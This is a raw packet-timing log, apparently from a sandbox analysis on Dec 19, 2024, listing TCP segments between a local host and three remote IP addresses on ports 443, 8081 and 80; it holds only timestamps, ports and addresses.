                  Dec 19, 2024 14:48:14.025707006 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.030216932 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.030272961 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.030291080 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.030487061 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.030539036 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.030555010 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.036725044 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.036773920 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.036788940 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.037398100 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.037441969 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.037451982 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.045433998 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.045627117 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.045634985 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.045788050 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.052623987 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.052663088 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.052756071 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.052756071 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.052772999 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.060091972 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.060461044 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.060476065 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.060569048 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.060587883 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.061455965 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.067049026 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.067069054 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.067141056 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.073091030 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.073174953 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.073210955 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.073245049 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.073256969 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.073313951 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.080604076 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.080641031 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.080674887 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.087455988 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.087476969 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.087529898 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.094460011 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.094543934 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.094556093 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.094671011 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.094753981 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.094762087 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.094863892 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.102183104 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.102204084 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.102324009 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.108932018 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.109030008 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.109039068 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.109533072 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.116056919 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.116077900 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.116449118 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.116492987 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.116605043 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.123419046 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.123497009 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.130218983 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.130239964 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.130381107 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.130795002 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.130863905 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.137470961 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.137548923 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.145600080 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.145715952 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.151758909 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.151843071 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.158907890 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.159097910 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.165877104 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.166105032 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.173197985 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.173379898 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.180197954 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.180751085 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.180788994 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.181163073 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.187743902 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.187889099 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.190939903 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.191127062 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.197976112 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.198249102 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.229732990 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.229885101 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.240238905 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.240533113 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.242400885 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.242778063 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.247761011 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.247939110 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.250387907 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.250556946 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.250571012 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.251764059 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.257817984 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.258102894 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.260090113 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.260225058 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.264816999 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.264982939 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.267340899 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.267637014 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.273937941 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.274166107 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.276624918 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.276734114 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.281203032 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.281498909 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.282716036 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.282881975 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.290003061 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.290144920 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.291359901 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.291565895 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.292355061 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.292807102 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.293735981 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.294980049 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.297247887 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.297363997 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.301264048 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.301373005 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.301923037 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.302007914 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.302933931 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.303076029 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.306601048 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.306833029 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.307650089 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.310174942 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.310224056 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.310242891 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.310272932 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.311491013 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.311564922 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.311566114 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.314945936 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.315634966 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.315836906 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.317878008 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.318823099 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.318907976 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.319600105 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.319900036 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.320935965 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.321070910 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.324440002 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.324552059 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.325707912 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.325788021 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.326793909 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.326911926 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.328116894 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.328218937 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.331705093 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.331749916 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.331785917 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.331926107 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.333621025 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.334533930 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.337922096 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.338087082 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.339230061 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.339435101 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.340020895 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.340137005 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.340327024 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.340595007 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.341698885 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.341785908 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.342783928 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.342956066 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.345180035 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.345334053 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.346467972 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.347579956 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.357038021 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.357479095 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.359700918 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.360682011 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.364413977 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.364604950 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.369155884 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.369287968 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.424753904 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.424787045 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.424834967 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.424871922 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.424871922 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.424892902 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.424906969 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.424925089 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.425023079 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.427735090 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.427834034 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.430876970 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.431629896 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.431639910 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.433245897 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.433255911 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.433444977 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.443500996 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.443562031 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.443619013 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.443629980 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.443659067 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.447144985 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.447165966 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.447233915 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.447233915 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.447247982 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.447545052 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.455115080 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.455156088 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.455203056 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.455213070 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.455246925 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.456653118 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.456830025 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.456841946 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.456934929 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.459486008 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.459515095 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.459522963 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.459552050 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.459563017 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.459589958 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.459594011 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.459628105 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.462960958 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.463119030 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.464046955 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.464143038 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.464338064 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.464451075 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.464463949 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.464598894 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.465981960 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.466064930 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.466928959 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.467108965 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.472155094 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.472207069 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.472239017 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.472249031 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.472271919 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.473735094 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.473908901 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.473921061 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.474023104 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.475522995 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.475569963 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.475617886 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.475625992 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.475657940 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.475785971 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.480742931 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.480787039 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.480819941 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.480833054 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.480858088 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.482824087 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.482870102 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.482918978 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.482933998 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.482937098 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.482971907 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.482983112 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.482983112 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.482991934 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.486869097 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.486978054 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.486993074 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.487134933 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.489125967 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.489635944 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.490695000 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.490740061 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.490782022 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.490788937 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.490814924 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.491007090 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.491453886 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.492296934 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.492436886 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.494376898 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.494497061 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.496918917 CET49726443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.496934891 CET44349726104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.497529030 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.497634888 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.497664928 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.497992039 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.503624916 CET49725443192.168.2.6104.21.40.214
                  Dec 19, 2024 14:48:14.503645897 CET44349725104.21.40.214192.168.2.6
                  Dec 19, 2024 14:48:14.620172024 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:48:14.742093086 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:48:14.742255926 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:48:15.499500036 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:48:15.619029999 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:48:16.547972918 CET4974280192.168.2.6103.252.117.185
                  Dec 19, 2024 14:48:16.633312941 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:48:16.667500973 CET8049742103.252.117.185192.168.2.6
                  Dec 19, 2024 14:48:16.667754889 CET4974280192.168.2.6103.252.117.185
                  Dec 19, 2024 14:48:16.679054976 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:48:17.124227047 CET4974280192.168.2.6103.252.117.185
                  Dec 19, 2024 14:48:17.243709087 CET8049742103.252.117.185192.168.2.6
                  Dec 19, 2024 14:48:19.112652063 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:48:19.176058054 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:48:38.586523056 CET8049742103.252.117.185192.168.2.6
                  Dec 19, 2024 14:48:38.586620092 CET4974280192.168.2.6103.252.117.185
                  Dec 19, 2024 14:48:38.586688995 CET4974280192.168.2.6103.252.117.185
                  Dec 19, 2024 14:48:41.732306957 CET4980680192.168.2.6103.252.117.185
                  Dec 19, 2024 14:48:41.851932049 CET8049806103.252.117.185192.168.2.6
                  Dec 19, 2024 14:48:41.852065086 CET4980680192.168.2.6103.252.117.185
                  Dec 19, 2024 14:48:42.487770081 CET4980680192.168.2.6103.252.117.185
                  Dec 19, 2024 14:48:42.607321978 CET8049806103.252.117.185192.168.2.6
                  Dec 19, 2024 14:49:03.041085958 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:49:03.160717964 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:49:03.743511915 CET8049806103.252.117.185192.168.2.6
                  Dec 19, 2024 14:49:03.743612051 CET4980680192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:03.743710995 CET4980680192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:04.243762016 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:49:04.288625956 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:49:06.875292063 CET4986980192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:06.994993925 CET8049869103.252.117.185192.168.2.6
                  Dec 19, 2024 14:49:06.995126963 CET4986980192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:07.415564060 CET4986980192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:07.535181046 CET8049869103.252.117.185192.168.2.6
                  Dec 19, 2024 14:49:28.900219917 CET8049869103.252.117.185192.168.2.6
                  Dec 19, 2024 14:49:28.900335073 CET4986980192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:28.900424957 CET4986980192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:32.023813009 CET4992380192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:32.143423080 CET8049923103.252.117.185192.168.2.6
                  Dec 19, 2024 14:49:32.143506050 CET4992380192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:32.535643101 CET4992380192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:32.655186892 CET8049923103.252.117.185192.168.2.6
                  Dec 19, 2024 14:49:49.156685114 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:49:49.205599070 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:49:49.509675980 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:49:49.814246893 CET497368081192.168.2.681.31.208.36
                  Dec 19, 2024 14:49:49.818944931 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:49:49.934326887 CET80814973681.31.208.36192.168.2.6
                  Dec 19, 2024 14:49:54.072398901 CET8049923103.252.117.185192.168.2.6
                  Dec 19, 2024 14:49:54.072519064 CET4992380192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:54.072643995 CET4992380192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:57.195626974 CET4998380192.168.2.6103.252.117.185
                  Dec 19, 2024 14:49:57.315254927 CET8049983103.252.117.185192.168.2.6
